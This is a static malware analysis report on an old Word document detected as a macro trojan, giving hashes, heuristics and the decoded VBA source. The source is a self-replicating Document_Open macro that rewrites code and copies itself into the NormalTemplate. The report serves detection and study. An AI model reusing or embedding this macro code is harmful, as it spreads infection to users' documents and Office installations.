Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b9d88201c004cbee…

MALICIOUS

Office (OLE)

31.5 KB Created: 2001-02-24 14:20:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 9a964de13366631def51012fcaeefc0c SHA-1: 6f2aeb927973f34da2bed4cc31bcb82c3f919c51 SHA-256: b9d88201c004cbeefb932ef0dc75f6a2d5686ce05657a7e9f085f6711186f9f7
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro appears to obfuscate its own code and potentially copy code from the NormalTemplate, suggesting an attempt to hide malicious functionality. The embedded URL and the ClamAV detection further indicate malicious intent, likely to download a second-stage payload.

Heuristics 4

  • ClamAV: Doc.Trojan.Hmc-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hmc-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://bobo.tlsecurity.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1278 bytes
SHA-256: 8083946f740028b446a9e648eab1948e86fed388f60af797ece078fdc8291463
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dr_bobo_macro_word_db"
Private Sub Document_Open()

'Author:   Dr.Bobo [bobo.tlsecurity.com]
'Name:     Dr.Bobo.Macro.Word.db
'Origin:   Croatia [Hrvatska]

Dim Norm, NormCode, NormLines, Doc, DocCode, DocLines
Set Norm = NormalTemplate.VBProject.VBComponents(1)
Set Doc = ActiveDocument.VBProject.VBComponents(1)
Set DocCode = Doc.CodeModule: Set NormCode = Norm.CodeModule

If DocCode.lines(23, 1) = "" Then
    For y = 1 To DocCode.countoflines
DocCode.replacelines y, "Dr.Bobo.Macro.Word.db"
    Next y
    For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
   Next x
End If

If NormCode.lines(23, 1) = "" Then
    For y = 1 To NormCode.countoflines
NormCode.replacelines y, "Dr.Bobo.Macro.Word.db"
    Next y
    For x = 1 To DocCode.countoflines
NormCode.insertlines 26 + x, DocCode.lines(x, 1)
    Next x
End If
End Sub

Private Sub Document_New()
End Sub

Private Sub Document_Close()
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.